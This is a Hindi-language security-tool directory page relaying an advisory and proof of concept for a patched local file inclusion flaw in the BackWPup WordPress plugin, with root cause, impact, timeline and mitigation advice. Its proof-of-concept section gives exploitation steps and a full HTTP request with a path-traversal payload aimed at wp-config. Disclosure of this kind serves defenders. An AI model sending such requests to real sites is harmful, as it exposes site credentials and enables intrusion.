Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/pixel-defaultbr/cve-2026-6227
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

CVE-2026-6227 के लिए शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट, जो BackWPup WordPress प्लगइन में एक प्रमाणित Local File Inclusion है, जिसमें root cause analysis, exploit request, और mitigation guidance शामिल है।

रिपॉजिटरी देखें
85 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-6227: बैकWPअप में लोकल फाइल इन्क्लूज़न

CVSS Version Researcher

सलाहकार सारांश

BackWPup के 5.6.6 तक के संस्करण /wp-json/backwpup/v1/getblock REST एंडपॉइंट के block_name पैरामीटर के माध्यम से एक प्रमाणित लोकल फाइल इन्क्लूज़न (LFI) भेद्यता से प्रभावित हैं।

यह दोष ट्रैवर्सल अनुक्रमों के गैर-पुनरावर्ती str_replace() सैनिटाइज़ेशन के कारण हुआ था और इसे संस्करण 5.6.7 में पहले ही ठीक कर दिया गया है।

मेटाडेटा

  • CVE: CVE-2026-6227
  • गंभीरता: उच्च
  • CVSS स्कोर: 7.2
  • प्रभावित उत्पाद: BackWPup WordPress प्लगइन
  • प्रभावित संस्करण: <= 5.6.6
  • ठीक किया गया संस्करण: 5.6.7
  • स्थिति: पैच किया गया
  • प्रकटीकरण तिथि: 2026-04-13
  • शोधकर्ता: Pixel_DefaultBR

अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक और नैतिक सुरक्षा अनुसंधान उद्देश्यों के लिए है। यहां दी गई जानकारी प्रशासकों और सुरक्षा टीमों को उनके सिस्टम सत्यापित करने में मदद करने के लिए है। स्पष्ट, लिखित अनुमति के बिना इसे लक्ष्यों के विरुद्ध उपयोग न करें।

प्रभावित सतह

  • फ़ंक्शन: BackWPupHelpers::component()
  • एंडपॉइंट: POST /wp-json/backwpup/v1/getblock
  • पैरामीटर: block_name
  • एक्सेस स्तर: प्रमाणित व्यवस्थापक (या बैकअप अनुमतियाँ सौंपे गए उपयोगकर्ता)

मूल कारण विश्लेषण

कमजोर घटक लोडर include() को आमंत्रित करने से पहले एक गैर-पुनरावर्ती str_replace() सैनिटाइज़ेशन लागू करता है। इसे ....// या ..././ जैसे क्राफ्टेड ट्रैवर्सल पैटर्न का उपयोग करके बायपास किया जा सकता है, जिससे हमलावर-नियंत्रित पथ समाधान की अनुमति मिलती है।

प्रभाव

  • सर्वर फाइल सिस्टम से मनमाना स्थानीय PHP फाइल इन्क्लूज़न
  • संभावित संवेदनशील डेटा एक्सपोज़र (उदाहरण के लिए, wp-config.php)
  • विशिष्ट सर्वर/एप्लिकेशन कॉन्फ़िगरेशन में संभावित रिमोट कोड निष्पादन

डिफ़ॉल्ट रूप से, शोषण के लिए व्यवस्थापक-स्तरीय पहुंच की आवश्यकता होती है। यदि बैकअप अनुमतियाँ सौंपी गई हैं, तो कम-विशेषाधिकार वाले उपयोगकर्ता भी इस समस्या का शोषण करने में सक्षम हो सकते हैं।

शोषण पूर्व शर्तें

  • मान्य प्रमाणित WordPress सत्र
  • मान्य REST नॉन्स
  • व्यवस्थापक विशेषाधिकार या सौंपी गई बैकअप अनुमतियाँ

प्रमाण की अवधारणा

परिदृश्य: लोकल फाइल इन्क्लूज़न

  1. BackWPup जॉब क्षमता वाले खाते का उपयोग करके WordPress में लॉग इन करें।
  2. प्लगइन UI से एक सामान्य अनुरोध ट्रिगर करें और प्रॉक्सी के साथ ट्रैफ़िक को इंटरसेप्ट करें।
  3. /wp-json/backwpup/v1/getblock के लिए एक वैध POST अनुरोध का पता लगाएं।
  4. block_name को ट्रैवर्सल पेलोड से बदलें।

उदाहरण अनुरोध:

POST /wp-json/backwpup/v1/getblock HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WP-Nonce: <your_nonce_here>
Cookie: wordpress_logged_in_<hash>=<your_session_cookie>

block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
  1. फाइल इन्क्लूज़न व्यवहार को सत्यापित करने के लिए प्रतिक्रिया का निरीक्षण करें।

समयरेखा

  • 2026-03: भेद्यता विक्रेता को रिपोर्ट की गई
  • 2026-03-25: विक्रेता पैच 5.6.7 में जारी किया गया
  • 2026-04-13: सार्वजनिक प्रकटीकरण (CVE-2026-6227)

शमन

  • BackWPup को संस्करण 5.6.7 या बाद में अपडेट करें
  • backwpup क्षमता का असाइनमेंट केवल विश्वसनीय भूमिकाओं तक सीमित रखें
  • /wp-json/backwpup/v1/getblock तक संदिग्ध पहुंच के लिए ऑडिट लॉग की समीक्षा करें

संदर्भ

  • विक्रेता प्लगइन पृष्ठ: https://wordpress.org/plugins/backwpup/
  • CVE संदर्भ (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
टूल डाउनलोड करें